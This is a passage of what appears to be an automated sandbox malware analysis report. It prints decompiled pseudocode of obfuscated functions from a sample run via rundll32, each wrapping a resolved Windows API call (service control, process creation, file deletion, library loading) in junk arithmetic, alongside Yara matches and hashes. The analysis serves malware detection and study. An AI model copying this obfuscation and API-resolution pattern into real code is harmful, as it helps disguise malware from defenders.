				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x002df662
                                          0x002df663
                                          0x002df665
                                          0x002df668
                                          0x002df66a
                                          0x002df66d
                                          0x002df670
                                          0x002df673
                                          0x002df677
                                          0x002df678
                                          0x002df67d
                                          0x002df687
                                          0x002df693
                                          0x002df69a
                                          0x002df6a1
                                          0x002df6a5
                                          0x002df6a9
                                          0x002df6b0
                                          0x002df6c9
                                          0x002df6d8
                                          0x002df6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002DF6D8
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: f66b86d70ea08470989d6c55e37db32ace61cd79a7b0e3d4768c68947e4fcb34
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: FC01E5B6901208BFEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E002D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x002db6f3
                                          0x002db6f8
                                          0x002db702
                                          0x002db70b
                                          0x002db712
                                          0x002db719
                                          0x002db720
                                          0x002db727
                                          0x002db72e
                                          0x002db747
                                          0x002db759
                                          0x002db75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002DB759
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 2780a1cfb28baf24f14bc61ed9d95751b9e7311bb49a078056a4429dac52ce89
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 0A0128B6951308FBEF45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x002eaa3f
                                          0x002eaa40
                                          0x002eaa41
                                          0x002eaa44
                                          0x002eaa47
                                          0x002eaa4b
                                          0x002eaa4c
                                          0x002eaa51
                                          0x002eaa5b
                                          0x002eaa64
                                          0x002eaa68
                                          0x002eaa6f
                                          0x002eaa76
                                          0x002eaa8d
                                          0x002eaa90
                                          0x002eaa9d
                                          0x002eaaa8
                                          0x002eaaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002EAAA8
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 80d1dbd7383808d9714fd673d1c4695f7773d193f4fc7a8a368331cf06fdbd7b
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: E3F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B29F649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E002D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x002d5fb5
                                          0x002d5fb6
                                          0x002d5fb7
                                          0x002d5fbb
                                          0x002d5fbc
                                          0x002d5fc1
                                          0x002d5fcb
                                          0x002d5fd7
                                          0x002d5fde
                                          0x002d5fe5
                                          0x002d5ffc
                                          0x002d5fff
                                          0x002d6006
                                          0x002d600d
                                          0x002d601a
                                          0x002d6025
                                          0x002d602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002D6025
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true
                                          • Associated: 0000000B.00000002.2100956087.00000000002D0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000B.00000002.2100999105.00000000002EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: d20045afc3d6dad25c85ab809cf4fb12272a8e30ce4beea6a5d8b1abdc9e2c59
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 3FF04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B15F569F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2352 Parent PID: 2440 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 002C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E002C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x002c295f
                                          0x002c2964
                                          0x002c2967
                                          0x002c296a
                                          0x002c296d
                                          0x002c296e
                                          0x002c296f
                                          0x002c2977
                                          0x002c2985
                                          0x002c298a
                                          0x002c2992
                                          0x002c299a
                                          0x002c29a2
                                          0x002c29a9
                                          0x002c29b0
                                          0x002c29b7
                                          0x002c29bb
                                          0x002c29cf
                                          0x002c29dc
                                          0x002c29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002C29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 298c9948ab27f537ea18a68636fbefa599cdee7894828efcba0b3336b1731e20
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: 52016D72A00108BFEB14DF95DC4A9DFBFB6EF44310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x002cc6e1
                                          0x002cc6e6
                                          0x002cc6f0
                                          0x002cc6fc
                                          0x002cc703
                                          0x002cc706
                                          0x002cc70d
                                          0x002cc711
                                          0x002cc715
                                          0x002cc71c
                                          0x002cc723
                                          0x002cc72a
                                          0x002cc731
                                          0x002cc738
                                          0x002cc751
                                          0x002cc762
                                          0x002cc768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002CC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: eba804cfb1708133eecf51fc6e686f85a13ab16d12e92fbcbd7321041c4e9a05
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: BE1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90966220D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E002C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x002c1006
                                          0x002c1009
                                          0x002c100c
                                          0x002c1011
                                          0x002c1016
                                          0x002c101d
                                          0x002c1026
                                          0x002c102d
                                          0x002c1034
                                          0x002c103b
                                          0x002c1047
                                          0x002c104f
                                          0x002c1057
                                          0x002c105e
                                          0x002c1065
                                          0x002c106c
                                          0x002c1073
                                          0x002c1077
                                          0x002c108b
                                          0x002c1096
                                          0x002c109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 002C1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 3d178c4779fafcc36863b262186f2e2f7717b1cd17556721c955f9b58a73b1a8
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: E7015BB6D01309BBEF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E002C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x002c485e
                                          0x002c487a
                                          0x002c487d
                                          0x002c4884
                                          0x002c488b
                                          0x002c4892
                                          0x002c489d
                                          0x002c48a0
                                          0x002c48ad
                                          0x002c48b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002C48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 7cc51aa423d44c523c078bcf2de7b93abc3f32d93dc7789c59202c98a93c806a
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 4DF01D70915209FBDB04CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E002D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x002d4f80
                                          0x002d4f81
                                          0x002d4f82
                                          0x002d4f86
                                          0x002d4f87
                                          0x002d4f8c
                                          0x002d4fa5
                                          0x002d4fa8
                                          0x002d4faf
                                          0x002d4fb6
                                          0x002d4fc7
                                          0x002d4fca
                                          0x002d4fd7
                                          0x002d4fe2
                                          0x002d4fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 002D4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: d33882d87fb76e5ebab56a7135da8880e9a12e1158c87a620e895f0ba6c33620
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: D4F037B081120CFFEB04DFA4D98689EBFBAEB40300F208299E808BB260D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E002D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x002d9772
                                          0x002d9773
                                          0x002d9778
                                          0x002d977a
                                          0x002d977b
                                          0x002d977e
                                          0x002d977f
                                          0x002d9782
                                          0x002d9785
                                          0x002d9788
                                          0x002d9789
                                          0x002d978c
                                          0x002d978f
                                          0x002d9790
                                          0x002d9791
                                          0x002d9794
                                          0x002d9797
                                          0x002d979a
                                          0x002d979d
                                          0x002d97a0
                                          0x002d97a3
                                          0x002d97a6
                                          0x002d97a7
                                          0x002d97a8
                                          0x002d97ad
                                          0x002d97b7
                                          0x002d97c3
                                          0x002d97ca
                                          0x002d97d1
                                          0x002d97d8
                                          0x002d97df
                                          0x002d97e3
                                          0x002d97fc
                                          0x002d9816
                                          0x002d981d

                                          APIs
                                          • CreateProcessW.KERNEL32(002C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002C591A), ref: 002D9816
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: dfa07a12a7093778b355002bd6240114c3d2acebedf94738e863881bd533476b
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 2A11B372911149BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002CB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E002CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x002cb569
                                          0x002cb56a
                                          0x002cb56d
                                          0x002cb572
                                          0x002cb574
                                          0x002cb577
                                          0x002cb57a
                                          0x002cb57d
                                          0x002cb580
                                          0x002cb583
                                          0x002cb586
                                          0x002cb587
                                          0x002cb58a
                                          0x002cb58d
                                          0x002cb590
                                          0x002cb593
                                          0x002cb594
                                          0x002cb595
                                          0x002cb59a
                                          0x002cb5a4
                                          0x002cb5b8
                                          0x002cb5c0
                                          0x002cb5c4
                                          0x002cb5cb
                                          0x002cb5d2
                                          0x002cb5d9
                                          0x002cb5e6
                                          0x002cb5fd
                                          0x002cb604

                                          APIs
                                          • CreateFileW.KERNELBASE(002D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002D0668,?,?,?,?), ref: 002CB5FD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 1fbe7ef9f6afe1d6efb1d44d9f07503704930d2c94ac1c71e4ac2df160b915ef
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 5311C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E002D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x002d9821
                                          0x002d9822
                                          0x002d9825
                                          0x002d9828
                                          0x002d982a
                                          0x002d982c
                                          0x002d982f
                                          0x002d9832
                                          0x002d9835
                                          0x002d9836
                                          0x002d9837
                                          0x002d983c
                                          0x002d9855
                                          0x002d9858
                                          0x002d985f
                                          0x002d9866
                                          0x002d986d
                                          0x002d9874
                                          0x002d987b
                                          0x002d988e
                                          0x002d989b
                                          0x002d98a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002C87F2,0000CAAE,0000510C,AD82F196), ref: 002D989B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 2c51633d4c246871e96e4ff57fc1691c1bcd40268a549b6abb8376533ba22d93
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
